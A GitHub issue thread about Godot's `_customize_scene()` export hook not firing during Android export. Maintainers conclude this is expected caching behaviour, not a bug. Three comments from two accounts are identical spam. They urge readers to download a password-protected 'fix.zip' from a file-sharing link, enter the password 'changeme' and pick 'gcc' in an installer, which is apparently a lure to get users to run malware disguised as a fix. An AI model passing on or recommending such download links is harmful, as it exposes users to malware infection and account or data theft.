### ISSUE TITLE
`_customize_scene()` is not called during Android export

### ISSUE THREAD

**Issue by cengiz-pz** [godotengine/godot#96104]
### Tested versions

Reproducible in 4.3.stable

### System information

Android 13 - Godot v4.3.stable - Windows 11 dev environment

### Issue description

The [documentation](https://docs.godotengine.org/en/stable/classes/class_editorexportplugin.html#class-editorexportplugin-private-method-begin-customize-scenes) states:

> Return true [from [`_begin_customize_scenes()`](https://docs.godotengine.org/en/stable/classes/class_editorexportplugin.html#class-editorexportplugin-private-method-begin-customize-scenes) method] if this plugin will customize scenes based on the platform and features used.
When enabled, [_get_customization_configuration_hash](https://docs.godotengine.org/en/stable/classes/class_editorexportplugin.html#class-editorexportplugin-private-method-get-customization-configuration-hash) and [_customize_scene](https://docs.godotengine.org/en/stable/classes/class_editorexportplugin.html#class-editorexportplugin-private-method-customize-scene) will be called and must be implemented.

However, in the attached project, [`_customize_scene()`](https://docs.godotengine.org/en/stable/classes/class_editorexportplugin.html#class-editorexportplugin-private-method-customize-scene) method is never called.

Interestingly, if the included plugin's `aar` archive files are removed and replaced with dummy files, then the export mechanism starts calling the [`_customize_scene()`](https://docs.godotengine.org/en/stable/classes/class_editorexportplugin.html#class-editorexportplugin-private-method-customize-scene) method.

### Steps to reproduce

1. Open attached project in Godot Editor
2. Install Android export template from Godot's Project menu
3. Select Android export preset and export debug
4. Check output tab & notice that `_customize_scene()` is never called (`addons/SharePlugin/ShareExportPlugin.gd`)
5. Remove `addons/SharePlugin/bin/debug/SharePlugin-3.0-debug.aar` and `addons/SharePlugin/bin/release/SharePlugin-3.0-release.aar` & replace with dummy files, & notice that export fails, but `_customize_scene()` method is called.

### Minimal reproduction project (MRP)

[customize-scenes.zip](https://github.com/user-attachments/files/16746105/customize-scenes.zip)

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by syntaxerror247** [comment]
@cengiz-pz During my tests, `_customize_scene()` is called if a scene is created/updated in project. Try adding a new child or creating a scene before export, it will call this function during export.

I think it should return `null` if no changes is made. I will look at codebase today (if i get some time).

**Comment by Alex2782** [comment]
> 4. Check output tab & notice that _customize_scene() is never called

I couldn't reproduce it

![image](https://github.com/user-attachments/assets/fdfce2c8-3385-4418-adfe-43108d189fc5)

**Comment by Alex2782** [comment]
> @cengiz-pz `_customize_scene()` is called if a scene is modified before export. [Doc link](https://docs.godotengine.org/en/stable/classes/class_editorexportplugin.html#class-editorexportplugin-private-method-customize-scene)
> 
> You can try adding a new child or creating a scene before export.

Reproduced in the 2nd attempt, what you wrote, what is in the documentation is correct.

PR: https://github.com/godotengine/godot/pull/65135
> Uses a cache for the converted files if nothing changes, so this work only happens if a file is modified.

For large projects it makes sense to speed up the export process. Otherwise, `editor_description` could be adjusted, e.g. write timestamps there to force `_customize_scene`.

I think no https://github.com/godotengine/godot/labels/bug and it can be closed?
